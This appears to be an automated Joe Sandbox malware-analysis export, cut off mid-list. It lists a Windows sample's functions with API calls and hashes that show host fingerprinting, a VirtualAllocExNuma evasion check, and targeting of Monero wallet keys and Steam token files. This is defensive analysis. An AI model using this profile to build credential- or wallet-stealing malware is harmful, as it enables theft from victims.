Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: ee9c0cd03adfa18f152a2660c8db874b3641fc07cbd2417c03ea48e1a39685ab
Instruction ID: dd6215eed73a0e9ba50a2cab9381244ad86ab8c7e450b8e25b5fe74562f813eb
Opcode Fuzzy Hash: ee9c0cd03adfa18f152a2660c8db874b3641fc07cbd2417c03ea48e1a39685ab
Instruction Fuzzy Hash: CA814575B002089FCF18EF64D991AEDB7B5FF95300F508529E80A9B251DB30AA09CBC2

Function 00197380 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 001973B0
RtlAllocateHeap.NTDLL(00000000), ref: 001973B7
GetComputerNameA.KERNEL32(?,00000104), ref: 001973CF

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: fef269757e9b2862cf0a95255c79156c1aa5d673ee1a25672f7047b8eca9ea22
Instruction ID: 9cd7f7e3da0e9d086cefb487e213ae242d2c6f89735275162bddbd765d9dd7f6
Opcode Fuzzy Hash: fef269757e9b2862cf0a95255c79156c1aa5d673ee1a25672f7047b8eca9ea22
Instruction Fuzzy Hash: B80181B1A04208EBCB05CF99DD45BAEBBBCFB09721F100619F905E3680D3745904CBA1

Function 6C673060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C673095

Part of subcall function 6C6735A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C6FF688,00001000), ref: 6C6735D5
Part of subcall function 6C6735A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6735E0
Part of subcall function 6C6735A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6735FD
Part of subcall function 6C6735A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C67363F
Part of subcall function 6C6735A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C67369F
Part of subcall function 6C6735A0: __aulldiv.LIBCMT ref: 6C6736E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C67309F

Part of subcall function 6C695B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6956EE,?,00000001), ref: 6C695B85
Part of subcall function 6C695B50: EnterCriticalSection.KERNEL32(6C6FF688,?,?,?,6C6956EE,?,00000001), ref: 6C695B90
Part of subcall function 6C695B50: LeaveCriticalSection.KERNEL32(6C6FF688,?,?,?,6C6956EE,?,00000001), ref: 6C695BD8
Part of subcall function 6C695B50: GetTickCount64.KERNEL32 ref: 6C695BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6730BE

Part of subcall function 6C6730F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C673127
Part of subcall function 6C6730F0: __aulldiv.LIBCMT ref: 6C673140

Part of subcall function 6C6AAB2A: __onexit.LIBCMT ref: 6C6AAB30

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 9bf5118b5bc833820fdcb21c7401f766a6372751390e56b8e24ada445aa9b498
Instruction ID: 51df039d868ffe682c9ce56915deeffaff98179365ca50e83b886be4c8fe527a
Opcode Fuzzy Hash: 9bf5118b5bc833820fdcb21c7401f766a6372751390e56b8e24ada445aa9b498
Instruction Fuzzy Hash: A5F04922D2074892CB10DF75A8C11EA73B1AF6B114F001729E86453611FF2061D8C3DF

Function 00198F10 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00198F24
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00198F45
CloseHandle.KERNEL32(00000000), ref: 00198F4F

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 1ea5a612da45b3bb96f3fedc440f837c22e91707e352b4f2e17e811914332457
Instruction ID: 67a6f7bb610c7526fc8c43012b06f28bf156d7ef43035c8eb3ef69c6b2082614
Opcode Fuzzy Hash: 1ea5a612da45b3bb96f3fedc440f837c22e91707e352b4f2e17e811914332457
Instruction Fuzzy Hash: C7F0FE75A0420CFBDB15DFA4DD4AFED7778AB09700F104598BB1997290DBB0AE85CB90

Function 00181110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0018112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00181132
ExitProcess.KERNEL32 ref: 00181143

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: e8d2c6553935eff1152f10d21939e6277cf91f3719a49a083878cfec1a8148b4
Instruction ID: e9126641a84a146a0111391efaba263cada80aaa26e83c748d5c97ae843ee54f
Opcode Fuzzy Hash: e8d2c6553935eff1152f10d21939e6277cf91f3719a49a083878cfec1a8148b4
Instruction Fuzzy Hash: F8E08C71A85308FBE710ABA0AC0EB497A6C9B05B02F204145F70ABA5C0C7B42A008B98

Function 00191520 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

Part of subcall function 00196FA0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00196FE2
Part of subcall function 00196FA0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0019701F
Part of subcall function 00196FA0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001970A3
Part of subcall function 00196FA0: RtlAllocateHeap.NTDLL(00000000), ref: 001970AA

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

Part of subcall function 00197130: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197144
Part of subcall function 00197130: RtlAllocateHeap.NTDLL(00000000), ref: 0019714B

Part of subcall function 00197260: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0019D5B0,000000FF,?,001917A9,00000000,?,013AD678,00000000,?), ref: 00197292
Part of subcall function 00197260: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0019D5B0,000000FF,?,001917A9,00000000,?,013AD678,00000000,?), ref: 00197299

Part of subcall function 001972F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001811B7), ref: 00197320
Part of subcall function 001972F0: RtlAllocateHeap.NTDLL(00000000), ref: 00197327
Part of subcall function 001972F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0019733F

Part of subcall function 00197380: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001973B0
Part of subcall function 00197380: RtlAllocateHeap.NTDLL(00000000), ref: 001973B7
Part of subcall function 00197380: GetComputerNameA.KERNEL32(?,00000104), ref: 001973CF

Part of subcall function 00197420: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001A0DD0,00000000,?), ref: 00197450
Part of subcall function 00197420: RtlAllocateHeap.NTDLL(00000000), ref: 00197457
Part of subcall function 00197420: GetLocalTime.KERNEL32(?,?,?,?,?,001A0DD0,00000000,?), ref: 00197464
Part of subcall function 00197420: wsprintfA.USER32 ref: 00197493

Part of subcall function 001974D0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013ADC70,00000000,?,001A0DE0,00000000,?,00000000,00000000), ref: 00197503
Part of subcall function 001974D0: RtlAllocateHeap.NTDLL(00000000), ref: 0019750A
Part of subcall function 001974D0: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013ADC70,00000000,?,001A0DE0,00000000,?,00000000,00000000,?), ref: 0019751D

Part of subcall function 001975A0: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,013ADC70,00000000,?,001A0DE0,00000000,?,00000000,00000000), ref: 001975D5

Part of subcall function 00197630: GetKeyboardLayoutList.USER32(00000000,00000000,001A059F), ref: 00197681
Part of subcall function 00197630: LocalAlloc.KERNEL32(00000040,?), ref: 00197699
Part of subcall function 00197630: GetKeyboardLayoutList.USER32(?,00000000), ref: 001976AD
Part of subcall function 00197630: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00197702
Part of subcall function 00197630: LocalFree.KERNEL32(00000000), ref: 001977C2

Part of subcall function 00197820: GetSystemPowerStatus.KERNEL32(?), ref: 0019784D

GetCurrentProcessId.KERNEL32(00000000,?,013AD718,00000000,?,001A0DF4,00000000,?,00000000,00000000,?,013ADC40,00000000,?,001A0DF0,00000000), ref: 00191B8E

Part of subcall function 00198F10: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00198F24
Part of subcall function 00198F10: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00198F45
Part of subcall function 00198F10: CloseHandle.KERNEL32(00000000), ref: 00198F4F

Part of subcall function 001978A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001978D7
Part of subcall function 001978A0: RtlAllocateHeap.NTDLL(00000000), ref: 001978DE
Part of subcall function 001978A0: RegOpenKeyExA.KERNEL32(80000002,0139BD58,00000000,00020119,?), ref: 001978FE
Part of subcall function 001978A0: RegQueryValueExA.KERNEL32(?,013AD5B8,00000000,00000000,000000FF,000000FF), ref: 0019791F
Part of subcall function 001978A0: RegCloseKey.ADVAPI32(?), ref: 00197932

Part of subcall function 00197A00: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00197A69
Part of subcall function 00197A00: GetLastError.KERNEL32 ref: 00197A78

Part of subcall function 00197970: GetSystemInfo.KERNEL32(001A0DFC), ref: 001979A0
Part of subcall function 00197970: wsprintfA.USER32 ref: 001979B6

Part of subcall function 00197BA0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,013ADBC8,00000000,?,001A0DFC,00000000,?,00000000), ref: 00197BD0
Part of subcall function 00197BA0: RtlAllocateHeap.NTDLL(00000000), ref: 00197BD7
Part of subcall function 00197BA0: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00197BF8
Part of subcall function 00197BA0: wsprintfA.USER32 ref: 00197C4C

Part of subcall function 00198260: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001A0DF8,00000000,?), ref: 001982CF
Part of subcall function 00198260: RtlAllocateHeap.NTDLL(00000000), ref: 001982D6
Part of subcall function 00198260: wsprintfA.USER32 ref: 001982F0

Part of subcall function 00197DC0: RegOpenKeyExA.KERNEL32(00000000,013AA9E0,00000000,00020019,00000000,001A05A6), ref: 00197E44

Part of subcall function 00197DC0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00197EC6
Part of subcall function 00197DC0: wsprintfA.USER32 ref: 00197EF9
Part of subcall function 00197DC0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00197F1B
Part of subcall function 00197DC0: RegCloseKey.ADVAPI32(00000000), ref: 00197F2C
Part of subcall function 00197DC0: RegCloseKey.ADVAPI32(00000000), ref: 00197F39

Part of subcall function 00198120: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0019816A
Part of subcall function 00198120: Process32First.KERNEL32(?,00000128), ref: 0019817E
Part of subcall function 00198120: Process32Next.KERNEL32(?,00000128), ref: 00198193
Part of subcall function 00198120: FindCloseChangeNotification.KERNEL32(?), ref: 00198201

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0019216B

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUserlstrcatlstrlen$AllocChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleLastLogicalMemoryModuleNextNotificationPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 2395215017-0
Opcode ID: 60e4261efb7387e8d05f3f520ca3908cf5742dffa0832f4619f7f94246566520
Instruction ID: e83c30c88d65650da814e1d96ef1f6f6a003899775ad9942624a905c9721ecfb
Opcode Fuzzy Hash: 60e4261efb7387e8d05f3f520ca3908cf5742dffa0832f4619f7f94246566520
Instruction Fuzzy Hash: 20722B72814118AACF19FB94DC92DEE737CAF65300F9042A9B51762061EF713B4CDAE6

Function 00186D90 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 627b631e06452f3eca42f3ae67deba55145104b3113014fea4844e901afb9c18
Instruction ID: cb8f50655d7e6023640e7753ec88aa70986af74cbc16b122aec5c98291999ebf
Opcode Fuzzy Hash: 627b631e06452f3eca42f3ae67deba55145104b3113014fea4844e901afb9c18
Instruction Fuzzy Hash: 9861E4B5900209EFCF18EF94E994BEEB7B0BB48304F108598E505AB280D775AF94DF91

Function 00194BE0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A1F0: lstrlen.KERNEL32(00184F55,?,?,00184F55,001A0DC6), ref: 0019A1FB
Part of subcall function 0019A1F0: lstrcpy.KERNEL32(001A0DC6,00000000), ref: 0019A255

lstrlen.KERNEL32(00000000,00000000,001A0AB3), ref: 00194C0A

Strings

steam_tokens.txt, xrefs: 00194C1F

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
